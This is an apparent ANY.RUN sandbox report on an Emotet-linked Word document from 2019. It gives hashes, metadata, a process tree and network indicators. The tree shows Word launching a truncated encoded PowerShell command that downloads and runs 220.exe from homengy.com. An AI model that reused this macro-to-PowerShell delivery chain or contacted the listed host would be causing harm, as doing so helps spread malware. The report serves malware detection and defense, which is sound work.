Field | Value
---|---
File name | 20191007 878250.doc
Full analysis | https://app.any.run/tasks/d9853733-aef2-424e-82f6-329eefea99a2
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.
Analysis date | October 09, 2019, 14:43:37
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: forecast, Subject: Incredible Plastic Soap, Author: Tiana Leannon, Comments: bleeding-edge mission-critical, Template: Normal.dotm, Last Saved By: Halie O'Keefe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 7 17:32:00 2019, Last Saved Time/Date: Mon Oct 7 17:32:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0
MD5 | 430618189FC70E817A482842E8B78962
SHA1 | EFACFE7AFE9154D6BA924915A5A8EE5645BF3DFA
SHA256 | BF709BC17DF401A4CCAD2EE86D6FCBD25EDD93A51ED9D28EA6ED04330B9AC48A
SSDEEP | 6144:Z95qGAPbLkI07NSU4jJnqATfDeW5xidvxst:Z95qGAXX07NSU4V7PZi

Extension | Type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
Manager | Hayes
HeadingPairs | 
TitleOfParts | -
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 193
Paragraphs | 1
Lines | 1
Company | Kuvalis, Schroeder and Von
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 166
Words | 28
Pages | 1
ModifyDate | 2019:10:07 16:32:00
CreateDate | 2019:10:07 16:32:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | Halie O'Keefe
Template | Normal.dotm
Comments | bleeding-edge mission-critical
Keywords | -
Author | Tiana Leannon
Subject | Incredible Plastic Soap
Title | forecast

PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\20191007 878250.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2264 | powershell -enco … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1876 | "C:\Users\admin\220.exe" | C:\Users\admin\220.exe | — | powershell.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Exit code: 0; Version: 1, 0, 0, 1
3024 | --82188f2e | C:\Users\admin\220.exe | — | 220.exe | User: admin; Company: Monkey Head Software; Integrity Level: MEDIUM; Description: Monkey Head Media Stream; Version: 1, 0, 0, 1

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDEC.tmp.cvr | — | — | —
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q1Z2RPSKP5Q9D2Y0Y3RS.temp | — | — | —
2380 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 11F9BB5296474D9D3BB408404DE0DF6A | 8FACF4318FF2A7B51C03D42607D6E5D4F005B2B714B1C3B90CC4253F68854CA2
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 236ED52BF102E263426DE7B576190E96 | 4D4F843A4793638BCB319BAE2B5A8D54BB7B2D3C98665CA311101083360F85FB
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\107A020D.wmf | wmf | A262438485FE6960F4EAEE514C9E6A46 | 6EBC0779E49963FA97B01C727BF795B79F7A45DD15BDD777CD4A2CADEB5550B6
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC2EC231.wmf | wmf | D1EA360D14D07DA4524374E54664EA75 | 035AEB7E1F82E3BA225956058EFC19D12787EB9EC0A7E6B9252FA5E906F52048
2264 | powershell.exe | C:\Users\admin\220.exe | executable | BADA3BF01142A56B6D2C33764C2405D1 | E6630ADFC5882BE333236FD4DA6B8FB8C86866B4768B7914FA9102A3DE3BC3B0
2264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 57F2BEBD8AB4D14DFF05F8F1EE1B1091 | 24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79E105EB.wmf | wmf | 9761D6F1CE99313C0A7914202993E2DF | B10CEBC6B8CDE018E4F035D17381692B8DF6043DB7A534F919C016D35F239CB9
2380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57396CA3.wmf | wmf | 373F24AD9DE3637F5AEFF80DBC53AAC7 | 6DE2B0F376190E412676B48A0E726C81509CA57669AC16C71AE5D8126BEF2AFC

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2264 | powershell.exe | 49.234.127.87:80 | homengy.com | — | CN | suspicious |

Domain | IP | Reputation
---|---|---
homengy.com | — | suspicious

PID | Process | Class | Message |
---|---|---|---|
2264 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2264 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2264 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |